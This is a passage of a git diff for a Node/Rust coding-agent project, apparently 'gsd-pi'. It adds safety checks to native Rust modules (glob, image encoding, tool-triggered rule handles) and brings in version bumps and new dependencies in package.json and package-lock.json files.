widths. + +### truncate + +Text truncation utilities. Truncates strings to a target length while preserving ANSI sequences and respecting grapheme boundaries. + +### ttsr + +Tool-triggered system rules. Evaluates and applies system-level rules that activate in response to specific tool invocations. + +### xxhash + +xxHash hashing. Provides fast, non-cryptographic hashing via the xxHash algorithm for content deduplication and cache keying. + ## Adding New Modules 1. Create a new crate in `native/crates/` (pure Rust library) diff --git a/native/crates/engine/src/glob.rs b/native/crates/engine/src/glob.rs index ed17b5b3c..61be0e1de 100644 --- a/native/crates/engine/src/glob.rs +++ b/native/crates/engine/src/glob.rs @@ -254,7 +254,7 @@ pub fn glob( let ct = task::CancelToken::new(timeout_ms); task::blocking("glob", ct, move |ct| { - run_glob( + let result = run_glob( GlobConfig { root: fs_cache::resolve_search_path(&path)?, include_hidden: hidden.unwrap_or(false), @@ -270,6 +270,10 @@ pub fn glob( }, on_match.as_ref(), ct, - ) + ); + // Explicitly drop the ThreadsafeFunction to release the N-API reference + // immediately rather than relying on implicit drop ordering. + drop(on_match); + result }) } diff --git a/native/crates/engine/src/image.rs b/native/crates/engine/src/image.rs index 22969ef30..7481e9f7e 100644 --- a/native/crates/engine/src/image.rs +++ b/native/crates/engine/src/image.rs @@ -103,31 +103,42 @@ fn decode_image_from_bytes(bytes: &[u8]) -> Result { .map_err(|e| Error::from_reason(format!("Failed to decode image: {e}"))) } +/// Compute a capacity hint for the encode buffer using checked arithmetic. +/// +/// Returns an error instead of panicking when `w * h * bytes_per_pixel` +/// overflows `usize`. +fn encode_capacity(w: u32, h: u32, bytes_per_pixel: usize) -> Result { + (w as usize) + .checked_mul(h as usize) + .and_then(|wh| wh.checked_mul(bytes_per_pixel)) + .ok_or_else(|| Error::from_reason("Image dimensions too large for encode buffer")) +} + fn encode_image(img: &DynamicImage, format: u8, quality: u8) -> Result> { let (w, h) = (img.width(), img.height()); match format { 0 => { - let mut buffer = Vec::with_capacity((w * h * 4) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 4)?); img.write_to(&mut Cursor::new(&mut buffer), ImageFormat::Png) .map_err(|e| Error::from_reason(format!("Failed to encode PNG: {e}")))?; Ok(buffer) }, 1 => { - let mut buffer = Vec::with_capacity((w * h * 3) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 3)?); let encoder = JpegEncoder::new_with_quality(&mut buffer, quality); img.write_with_encoder(encoder) .map_err(|e| Error::from_reason(format!("Failed to encode JPEG: {e}")))?; Ok(buffer) }, 2 => { - let mut buffer = Vec::with_capacity((w * h * 4) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 4)?); let encoder = WebPEncoder::new_lossless(&mut buffer); img.write_with_encoder(encoder) .map_err(|e| Error::from_reason(format!("Failed to encode WebP: {e}")))?; Ok(buffer) }, 3 => { - let mut buffer = Vec::with_capacity((w * h) as usize); + let mut buffer = Vec::with_capacity(encode_capacity(w, h, 1)?); img.write_to(&mut Cursor::new(&mut buffer), ImageFormat::Gif) .map_err(|e| Error::from_reason(format!("Failed to encode GIF: {e}")))?; Ok(buffer) diff --git a/native/crates/engine/src/ttsr.rs b/native/crates/engine/src/ttsr.rs index 571105936..7a513c7c9 100644 --- a/native/crates/engine/src/ttsr.rs +++ b/native/crates/engine/src/ttsr.rs @@ -34,6 +34,15 @@ pub struct NapiTtsrRuleInput { pub conditions: Vec, } +/// Maximum number of live handles allowed before we refuse to allocate more. +/// Prevents unbounded memory growth if JS callers forget to free handles. +const MAX_LIVE_HANDLES: usize = 10_000; + +/// Lock the global STORE, recovering gracefully from mutex poisoning. +fn lock_store() -> std::sync::MutexGuard<'static, HashMap> { + STORE.lock().unwrap_or_else(|e| e.into_inner()) +} + /// Compile a set of TTSR rules into an optimized regex engine. /// /// Returns an opaque numeric handle. Each rule has one or more regex condition @@ -69,10 +78,13 @@ pub fn ttsr_compile_rules(rules: Vec) -> Result { mappings, }; - STORE - .lock() - .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))? - .insert(handle, compiled); + let mut store = lock_store(); + if store.len() >= MAX_LIVE_HANDLES { + return Err(Error::from_reason(format!( + "TTSR handle limit reached ({MAX_LIVE_HANDLES}). Free unused handles before compiling more rules." + ))); + } + store.insert(handle, compiled); // Return as f64 since napi BigInt interop is awkward; handles won't exceed 2^53. Ok(handle as f64) @@ -86,9 +98,13 @@ pub fn ttsr_compile_rules(rules: Vec) -> Result { pub fn ttsr_check_buffer(handle: f64, buffer: String) -> Result> { let handle_key = handle as u64; - let store = STORE - .lock() - .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))?; + // Bounds-check: reject handles that were never allocated. + let upper_bound = NEXT_HANDLE.load(Ordering::Relaxed); + if handle_key == 0 || handle_key >= upper_bound { + return Err(Error::from_reason(format!("Invalid TTSR handle: {handle}"))); + } + + let store = lock_store(); let compiled = store .get(&handle_key) @@ -114,11 +130,14 @@ pub fn ttsr_check_buffer(handle: f64, buffer: String) -> Result> { #[napi(js_name = "ttsrFreeRules")] pub fn ttsr_free_rules(handle: f64) -> Result<()> { let handle_key = handle as u64; - - STORE - .lock() - .map_err(|e| Error::from_reason(format!("Lock poisoned: {e}")))? - .remove(&handle_key); - + lock_store().remove(&handle_key); Ok(()) } + +/// Free all compiled TTSR rule sets, releasing all memory. +/// +/// Useful for process cleanup or tests that need a fresh state. +#[napi(js_name = "ttsrClearAll")] +pub fn ttsr_clear_all() { + lock_store().clear(); +} diff --git a/native/npm/darwin-arm64/package.json b/native/npm/darwin-arm64/package.json index 63bbc0a5a..b353e5395 100644 --- a/native/npm/darwin-arm64/package.json +++ b/native/npm/darwin-arm64/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-darwin-arm64", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for macOS ARM64", "os": [ "darwin" diff --git a/native/npm/darwin-x64/package.json b/native/npm/darwin-x64/package.json index 8c35ac1ae..130b0a8d8 100644 --- a/native/npm/darwin-x64/package.json +++ b/native/npm/darwin-x64/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-darwin-x64", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for macOS Intel", "os": [ "darwin" diff --git a/native/npm/linux-arm64-gnu/package.json b/native/npm/linux-arm64-gnu/package.json index f4d9c1d7e..451c3a006 100644 --- a/native/npm/linux-arm64-gnu/package.json +++ b/native/npm/linux-arm64-gnu/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-linux-arm64-gnu", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for Linux ARM64 (glibc)", "os": [ "linux" diff --git a/native/npm/linux-x64-gnu/package.json b/native/npm/linux-x64-gnu/package.json index edfb90185..388821fd1 100644 --- a/native/npm/linux-x64-gnu/package.json +++ b/native/npm/linux-x64-gnu/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-linux-x64-gnu", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for Linux x64 (glibc)", "os": [ "linux" diff --git a/native/npm/win32-x64-msvc/package.json b/native/npm/win32-x64-msvc/package.json index 84e34fa68..31ef4a6b7 100644 --- a/native/npm/win32-x64-msvc/package.json +++ b/native/npm/win32-x64-msvc/package.json @@ -1,6 +1,6 @@ { "name": "@gsd-build/engine-win32-x64-msvc", - "version": "2.41.0", + "version": "2.67.0", "description": "GSD native engine binary for Windows x64 (MSVC)", "os": [ "win32" diff --git a/package-lock.json b/package-lock.json index c5d64fb9d..cae86f699 100644 --- a/package-lock.json +++ b/package-lock.json @@ -1,12 +1,12 @@ { "name": "gsd-pi", - "version": "2.40.0", + "version": "2.66.1", "lockfileVersion": 3, "requires": true, "packages": { "": { "name": "gsd-pi", - "version": "2.40.0", + "version": "2.66.1", "hasInstallScript": true, "license": "MIT", "workspaces": [ @@ -61,6 +61,7 @@ "@types/node": "^24.12.0", "@types/picomatch": "^4.0.2", "c8": "^11.0.0", + "esbuild": "^0.25.12", "jiti": "^2.6.1", "typescript": "^5.4.0" }, @@ -68,6 +69,7 @@ "node": ">=22.0.0" }, "optionalDependencies": { + "@anthropic-ai/claude-agent-sdk": "^0.2.83", "@gsd-build/engine-darwin-arm64": ">=2.10.2", "@gsd-build/engine-darwin-x64": ">=2.10.2", "@gsd-build/engine-linux-arm64-gnu": ">=2.10.2", @@ -77,6 +79,30 @@ "koffi": "^2.9.0" } }, + "node_modules/@anthropic-ai/claude-agent-sdk": { + "version": "0.2.83", + "resolved": "https://registry.npmjs.org/@anthropic-ai/claude-agent-sdk/-/claude-agent-sdk-0.2.83.tgz", + "integrity": "sha512-O8g56htGMxrwbjCbqUqRBMNC0O98B7SkPnfQC7vmo3w2DVnUrBj3qat/IBLB8SI4sjVSZHeJrcK7+ozsCzStSw==", + "license": "SEE LICENSE IN README.md", + "optional": true, + "engines": { + "node": ">=18.0.0" + }, + "optionalDependencies": { + "@img/sharp-darwin-arm64": "^0.34.2", + "@img/sharp-darwin-x64": "^0.34.2", + "@img/sharp-linux-arm": "^0.34.2", + "@img/sharp-linux-arm64": "^0.34.2", + "@img/sharp-linux-x64": "^0.34.2", + "@img/sharp-linuxmusl-arm64": "^0.34.2", + "@img/sharp-linuxmusl-x64": "^0.34.2", + "@img/sharp-win32-arm64": "^0.34.2", + "@img/sharp-win32-x64": "^0.34.2" + }, + "peerDependencies": { + "zod": "^4.0.0" + } + }, "node_modules/@anthropic-ai/sdk": { "version": "0.73.0", "resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.73.0.tgz", @@ -820,13 +846,13 @@ } }, "node_modules/@aws-sdk/xml-builder": { - "version": "3.972.10", - "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.10.tgz", - "integrity": "sha512-OnejAIVD+CxzyAUrVic7lG+3QRltyja9LoNqCE/1YVs8ichoTbJlVSaZ9iSMcnHLyzrSNtvaOGjSDRP+d/ouFA==", + "version": "3.972.17", + "resolved": "https://registry.npmjs.org/@aws-sdk/xml-builder/-/xml-builder-3.972.17.tgz", + "integrity": "sha512-Ra7hjqAZf1OXRRMueB13qex7mFJRDK/pgCvdSFemXBT8KCGnQDPoKzHY1SjN+TjJVmnpSF14W5tJ1vDamFu+Gg==", "license": "Apache-2.0", "dependencies": { - "@smithy/types": "^4.13.0", - "fast-xml-parser": "5.4.1", + "@smithy/types": "^4.14.0", + "fast-xml-parser": "5.5.8", "tslib": "^2.6.2" }, "engines": { @@ -1218,6 +1244,155 @@ "sisteransi": "^1.0.5" } }, + "node_modules/@discordjs/builders": { + "version": "1.14.1", + "resolved": "https://registry.npmjs.org/@discordjs/builders/-/builders-1.14.1.tgz", + "integrity": "sha512-gSKkhXLqs96TCzk66VZuHHl8z2bQMJFGwrXC0f33ngK+FLNau4hU1PYny3DNJfNdSH+gVMzE85/d5FQ2BpcNwQ==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/formatters": "^0.6.2", + "@discordjs/util": "^1.2.0", + "@sapphire/shapeshift": "^4.0.0", + "discord-api-types": "^0.38.40", + "fast-deep-equal": "^3.1.3", + "ts-mixer": "^6.0.4", + "tslib": "^2.6.3" + }, + "engines": { + "node": ">=16.11.0" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/collection": { + "version": "1.5.3", + "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-1.5.3.tgz", + "integrity": "sha512-SVb428OMd3WO1paV3rm6tSjM4wC+Kecaa1EUGX7vc6/fddvw/6lg90z4QtCqm21zvVe92vMMDt9+DkIvjXImQQ==", + "license": "Apache-2.0", + "engines": { + "node": ">=16.11.0" + } + }, + "node_modules/@discordjs/formatters": { + "version": "0.6.2", + "resolved": "https://registry.npmjs.org/@discordjs/formatters/-/formatters-0.6.2.tgz", + "integrity": "sha512-y4UPwWhH6vChKRkGdMB4odasUbHOUwy7KL+OVwF86PvT6QVOwElx+TiI1/6kcmcEe+g5YRXJFiXSXUdabqZOvQ==", + "license": "Apache-2.0", + "dependencies": { + "discord-api-types": "^0.38.33" + }, + "engines": { + "node": ">=16.11.0" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/rest": { + "version": "2.6.1", + "resolved": "https://registry.npmjs.org/@discordjs/rest/-/rest-2.6.1.tgz", + "integrity": "sha512-wwQdgjeaoYFiaG+atbqx6aJDpqW7JHAo0HrQkBTbYzM3/PJ3GweQIpgElNcGZ26DCUOXMyawYd0YF7vtr+fZXg==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/collection": "^2.1.1", + "@discordjs/util": "^1.2.0", + "@sapphire/async-queue": "^1.5.3", + "@sapphire/snowflake": "^3.5.5", + "@vladfrangu/async_event_emitter": "^2.4.6", + "discord-api-types": "^0.38.40", + "magic-bytes.js": "^1.13.0", + "tslib": "^2.6.3", + "undici": "6.24.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/rest/node_modules/@discordjs/collection": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-2.1.1.tgz", + "integrity": "sha512-LiSusze9Tc7qF03sLCujF5iZp7K+vRNEDBZ86FT9aQAv3vxMLihUvKvpsCWiQ2DJq1tVckopKm1rxomgNUc9hg==", + "license": "Apache-2.0", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/rest/node_modules/@sapphire/snowflake": { + "version": "3.5.5", + "resolved": "https://registry.npmjs.org/@sapphire/snowflake/-/snowflake-3.5.5.tgz", + "integrity": "sha512-xzvBr1Q1c4lCe7i6sRnrofxeO1QTP/LKQ6A6qy0iB4x5yfiSfARMEQEghojzTNALDTcv8En04qYNIco9/K9eZQ==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/@discordjs/rest/node_modules/undici": { + "version": "6.24.1", + "resolved": "https://registry.npmjs.org/undici/-/undici-6.24.1.tgz", + "integrity": "sha512-sC+b0tB1whOCzbtlx20fx3WgCXwkW627p4EA9uM+/tNNPkSS+eSEld6pAs9nDv7WbY1UUljBMYPtu9BCOrCWKA==", + "license": "MIT", + "engines": { + "node": ">=18.17" + } + }, + "node_modules/@discordjs/util": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/@discordjs/util/-/util-1.2.0.tgz", + "integrity": "sha512-3LKP7F2+atl9vJFhaBjn4nOaSWahZ/yWjOvA4e5pnXkt2qyXRCHLxoBQy81GFtLGCq7K9lPm9R517M1U+/90Qg==", + "license": "Apache-2.0", + "dependencies": { + "discord-api-types": "^0.38.33" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/ws": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/@discordjs/ws/-/ws-1.2.3.tgz", + "integrity": "sha512-wPlQDxEmlDg5IxhJPuxXr3Vy9AjYq5xCvFWGJyD7w7Np8ZGu+Mc+97LCoEc/+AYCo2IDpKioiH0/c/mj5ZR9Uw==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/collection": "^2.1.0", + "@discordjs/rest": "^2.5.1", + "@discordjs/util": "^1.1.0", + "@sapphire/async-queue": "^1.5.2", + "@types/ws": "^8.5.10", + "@vladfrangu/async_event_emitter": "^2.2.4", + "discord-api-types": "^0.38.1", + "tslib": "^2.6.2", + "ws": "^8.17.0" + }, + "engines": { + "node": ">=16.11.0" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/@discordjs/ws/node_modules/@discordjs/collection": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/@discordjs/collection/-/collection-2.1.1.tgz", + "integrity": "sha512-LiSusze9Tc7qF03sLCujF5iZp7K+vRNEDBZ86FT9aQAv3vxMLihUvKvpsCWiQ2DJq1tVckopKm1rxomgNUc9hg==", + "license": "Apache-2.0", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, "node_modules/@electron/get": { "version": "2.0.3", "resolved": "https://registry.npmjs.org/@electron/get/-/get-2.0.3.tgz", @@ -1725,6 +1900,10 @@ } } }, + "node_modules/@gsd-build/daemon": { + "resolved": "packages/daemon", + "link": true + }, "node_modules/@gsd-build/engine-darwin-arm64": { "version": "2.10.5", "resolved": "https://registry.npmjs.org/@gsd-build/engine-darwin-arm64/-/engine-darwin-arm64-2.10.5.tgz", @@ -1790,6 +1969,14 @@ "win32" ] }, + "node_modules/@gsd-build/mcp-server": { + "resolved": "packages/mcp-server", + "link": true + }, + "node_modules/@gsd-build/rpc-client": { + "resolved": "packages/rpc-client", + "link": true + }, "node_modules/@gsd/native": { "resolved": "packages/native", "link": true @@ -1815,9 +2002,9 @@ "link": true }, "node_modules/@hono/node-server": { - "version": "1.19.11", - "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.11.tgz", - "integrity": "sha512-dr8/3zEaB+p0D2n/IUrlPF1HZm586qgJNXK1a9fhg/PzdtkK7Ksd5l312tJX2yBuALqDYBlG20QEbayqPyxn+g==", + "version": "1.19.13", + "resolved": "https://registry.npmjs.org/@hono/node-server/-/node-server-1.19.13.tgz", + "integrity": "sha512-TsQLe4i2gvoTtrHje625ngThGBySOgSK3Xo2XRYOdqGN1teR8+I7vchQC46uLJi8OF62YTYA3AhSpumtkhsaKQ==", "license": "MIT", "engines": { "node": ">=18.14.1" @@ -3028,6 +3215,39 @@ ], "peer": true }, + "node_modules/@sapphire/async-queue": { + "version": "1.5.5", + "resolved": "https://registry.npmjs.org/@sapphire/async-queue/-/async-queue-1.5.5.tgz", + "integrity": "sha512-cvGzxbba6sav2zZkH8GPf2oGk9yYoD5qrNWdu9fRehifgnFZJMV+nuy2nON2roRO4yQQ+v7MK/Pktl/HgfsUXg==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, + "node_modules/@sapphire/shapeshift": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/@sapphire/shapeshift/-/shapeshift-4.0.0.tgz", + "integrity": "sha512-d9dUmWVA7MMiKobL3VpLF8P2aeanRTu6ypG2OIaEv/ZHH/SUQ2iHOVyi5wAPjQ+HmnMuL0whK9ez8I/raWbtIg==", + "license": "MIT", + "dependencies": { + "fast-deep-equal": "^3.1.3", + "lodash": "^4.17.21" + }, + "engines": { + "node": ">=v16" + } + }, + "node_modules/@sapphire/snowflake": { + "version": "3.5.3", + "resolved": "https://registry.npmjs.org/@sapphire/snowflake/-/snowflake-3.5.3.tgz", + "integrity": "sha512-jjmJywLAFoWeBi1W7994zZyiNWPIiqRRNAmSERxyg93xRGzNYvGjlZ0gR6x0F4gPRi2+0O6S71kOZYyr3cxaIQ==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, "node_modules/@silvia-odwyer/photon-node": { "version": "0.3.4", "resolved": "https://registry.npmjs.org/@silvia-odwyer/photon-node/-/photon-node-0.3.4.tgz", @@ -3474,9 +3694,9 @@ } }, "node_modules/@smithy/types": { - "version": "4.13.1", - "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.13.1.tgz", - "integrity": "sha512-787F3yzE2UiJIQ+wYW1CVg2odHjmaWLGksnKQHUrK/lYZSEcy1msuLVvxaR/sI2/aDe9U+TBuLsXnr3vod1g0g==", + "version": "4.14.0", + "resolved": "https://registry.npmjs.org/@smithy/types/-/types-4.14.0.tgz", + "integrity": "sha512-OWgntFLW88kx2qvf/c/67Vno1yuXm/f9M7QFAtVkkO29IJXGBIg0ycEaBTH0kvCtwmvZxRujrgP5a86RvsXJAQ==", "license": "Apache-2.0", "dependencies": { "tslib": "^2.6.2" @@ -4208,6 +4428,15 @@ "@types/node": "*" } }, + "node_modules/@types/ws": { + "version": "8.18.1", + "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz", + "integrity": "sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==", + "license": "MIT", + "dependencies": { + "@types/node": "*" + } + }, "node_modules/@types/yauzl": { "version": "2.10.3", "resolved": "https://registry.npmjs.org/@types/yauzl/-/yauzl-2.10.3.tgz", @@ -4239,6 +4468,16 @@ "vite": "^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0 || ^8.0.0" } }, + "node_modules/@vladfrangu/async_event_emitter": { + "version": "2.4.7", + "resolved": "https://registry.npmjs.org/@vladfrangu/async_event_emitter/-/async_event_emitter-2.4.7.tgz", + "integrity": "sha512-Xfe6rpCTxSxfbswi/W/Pz7zp1WWSNn4A0eW4mLkQUewCrXXtMj31lCg+iQyTkh/CkusZSq9eDflu7tjEDXUY6g==", + "license": "MIT", + "engines": { + "node": ">=v14.0.0", + "npm": ">=7.0.0" + } + }, "node_modules/accepts": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/accepts/-/accepts-2.0.0.tgz", @@ -4377,9 +4616,9 @@ } }, "node_modules/basic-ftp": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.2.0.tgz", - "integrity": "sha512-VoMINM2rqJwJgfdHq6RiUudKt2BV+FY5ZFezP/ypmwayk68+NzzAQy4XXLlqsGD4MCzq3DrmNFD/uUmBJuGoXw==", + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/basic-ftp/-/basic-ftp-5.2.1.tgz", + "integrity": "sha512-0yaL8JdxTknKDILitVpfYfV2Ob6yb3udX/hK97M7I3jOeznBNxQPtVvTUtnhUkyHlxFWyr5Lvknmgzoc7jf+1Q==", "license": "MIT", "engines": { "node": ">=10.0.0" @@ -4440,9 +4679,9 @@ "license": "MIT" }, "node_modules/brace-expansion": { - "version": "5.0.4", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.4.tgz", - "integrity": "sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==", + "version": "5.0.5", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.5.tgz", + "integrity": "sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==", "license": "MIT", "dependencies": { "balanced-match": "^4.0.2" @@ -4967,6 +5206,51 @@ "node": ">=0.3.1" } }, + "node_modules/discord-api-types": { + "version": "0.38.42", + "resolved": "https://registry.npmjs.org/discord-api-types/-/discord-api-types-0.38.42.tgz", + "integrity": "sha512-qs1kya7S84r5RR8m9kgttywGrmmoHaRifU1askAoi+wkoSefLpZP6aGXusjNw5b0jD3zOg3LTwUa3Tf2iHIceQ==", + "license": "MIT", + "workspaces": [ + "scripts/actions/documentation" + ] + }, + "node_modules/discord.js": { + "version": "14.26.2", + "resolved": "https://registry.npmjs.org/discord.js/-/discord.js-14.26.2.tgz", + "integrity": "sha512-feShi+gULJ6R2MAA4/KkCFnkJcuVrROJrKk4czplzq8gE1oqhqgOy9K0Scu44B8oGeWKe04egquzf+ia6VtXAw==", + "license": "Apache-2.0", + "dependencies": { + "@discordjs/builders": "^1.14.1", + "@discordjs/collection": "1.5.3", + "@discordjs/formatters": "^0.6.2", + "@discordjs/rest": "^2.6.1", + "@discordjs/util": "^1.2.0", + "@discordjs/ws": "^1.2.3", + "@sapphire/snowflake": "3.5.3", + "discord-api-types": "^0.38.40", + "fast-deep-equal": "3.1.3", + "lodash.snakecase": "4.1.1", + "magic-bytes.js": "^1.13.0", + "tslib": "^2.6.3", + "undici": "6.24.1" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/discordjs/discord.js?sponsor" + } + }, + "node_modules/discord.js/node_modules/undici": { + "version": "6.24.1", + "resolved": "https://registry.npmjs.org/undici/-/undici-6.24.1.tgz", + "integrity": "sha512-sC+b0tB1whOCzbtlx20fx3WgCXwkW627p4EA9uM+/tNNPkSS+eSEld6pAs9nDv7WbY1UUljBMYPtu9BCOrCWKA==", + "license": "MIT", + "engines": { + "node": ">=18.17" + } + }, "node_modules/dunder-proto": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", @@ -4997,9 +5281,9 @@ "license": "MIT" }, "node_modules/electron": { - "version": "41.0.3", - "resolved": "https://registry.npmjs.org/electron/-/electron-41.0.3.tgz", - "integrity": "sha512-IDjx8liW1q+r7+MOip5W1Eo1eMwJzVObmYrd9yz2dPCkS7XlgLq3qPVMR80TpiROFp73iY30kTzMdpA6fEVs3A==", + "version": "41.2.0", + "resolved": "https://registry.npmjs.org/electron/-/electron-41.2.0.tgz", + "integrity": "sha512-0OKLiymqfV0WK68RBXqAm3Myad2TpI5wwxLCBEUcH5Nugo3YfSk7p1Js/AL9266qTz5xZioUnxt9hG8FFwax0g==", "dev": true, "hasInstallScript": true, "license": "MIT", @@ -5419,9 +5703,9 @@ "license": "BSD-3-Clause" }, "node_modules/fast-xml-builder": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.2.tgz", - "integrity": "sha512-NJAmiuVaJEjVa7TjLZKlYd7RqmzOC91EtPFXHvlTcqBVo50Qh7XV5IwvXi1c7NRz2Q/majGX9YLcwJtWgHjtkA==", + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.4.tgz", + "integrity": "sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==", "funding": [ { "type": "github", @@ -5434,9 +5718,9 @@ } }, "node_modules/fast-xml-parser": { - "version": "5.4.1", - "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.4.1.tgz", - "integrity": "sha512-BQ30U1mKkvXQXXkAGcuyUA/GA26oEB7NzOtsxCDtyu62sjGw5QraKFhx2Em3WQNjPw9PG6MQ9yuIIgkSDfGu5A==", + "version": "5.5.8", + "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.8.tgz", + "integrity": "sha512-Z7Fh2nVQSb2d+poDViM063ix2ZGt9jmY1nWhPfHBOK2Hgnb/OW3P4Et3P/81SEej0J7QbWtJqxO05h8QYfK7LQ==", "funding": [ { "type": "github", @@ -5445,8 +5729,9 @@ ], "license": "MIT", "dependencies": { - "fast-xml-builder": "^1.0.0", - "strnum": "^2.1.2" + "fast-xml-builder": "^1.1.4", + "path-expression-matcher": "^1.2.0", + "strnum": "^2.2.0" }, "bin": { "fxparser": "src/cli/cli.js" @@ -5504,9 +5789,9 @@ } }, "node_modules/file-type": { - "version": "21.3.1", - "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.1.tgz", - "integrity": "sha512-SrzXX46I/zsRDjTb82eucsGg0ODq2NpGDp4HcsFKApPy8P8vACjpJRDoGGMfEzhFC0ry61ajd7f72J3603anBA==", + "version": "21.3.4", + "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.4.tgz", + "integrity": "sha512-Ievi/yy8DS3ygGvT47PjSfdFoX+2isQueoYP1cntFW1JLYAuS4GD7NUPGg4zv2iZfV52uDyk5w5Z0TdpRS6Q1g==", "license": "MIT", "dependencies": { "@tokenizer/inflate": "^0.4.1", @@ -5978,9 +6263,9 @@ } }, "node_modules/hono": { - "version": "4.12.8", - "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.8.tgz", - "integrity": "sha512-VJCEvtrezO1IAR+kqEYnxUOoStaQPGrCmX3j4wDTNOcD1uRPFpGlwQUIW8niPuvHXaTUxeOUl5MMDGrl+tmO9A==", + "version": "4.12.12", + "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.12.tgz", + "integrity": "sha512-p1JfQMKaceuCbpJKAPKVqyqviZdS0eUxH9v82oWo1kb9xjQ5wA6iP3FNVAPDFlz5/p7d45lO+BpSk1tuSZMF4Q==", "license": "MIT", "engines": { "node": ">=16.9.0" @@ -6638,6 +6923,18 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/lodash": { + "version": "4.18.1", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz", + "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==", + "license": "MIT" + }, + "node_modules/lodash.snakecase": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/lodash.snakecase/-/lodash.snakecase-4.1.1.tgz", + "integrity": "sha512-QZ1d4xoBHYUeuouhEq3lk3Uq7ldgyFXGBhg04+oRLnIz8o9T65Eh+8YdroUwn846zchkA9yDsDl5CVVaV2nqYw==", + "license": "MIT" + }, "node_modules/long": { "version": "5.3.2", "resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz", @@ -6663,6 +6960,12 @@ "node": "20 || >=22" } }, + "node_modules/magic-bytes.js": { + "version": "1.13.0", + "resolved": "https://registry.npmjs.org/magic-bytes.js/-/magic-bytes.js-1.13.0.tgz", + "integrity": "sha512-afO2mnxW7GDTXMm5/AoN1WuOcdoKhtgXjIvHmobqTD1grNplhGdv3PFOyjCVmrnOZBIT/gD/koDKpYG+0mvHcg==", + "license": "MIT" + }, "node_modules/magic-string": { "version": "0.30.21", "resolved": 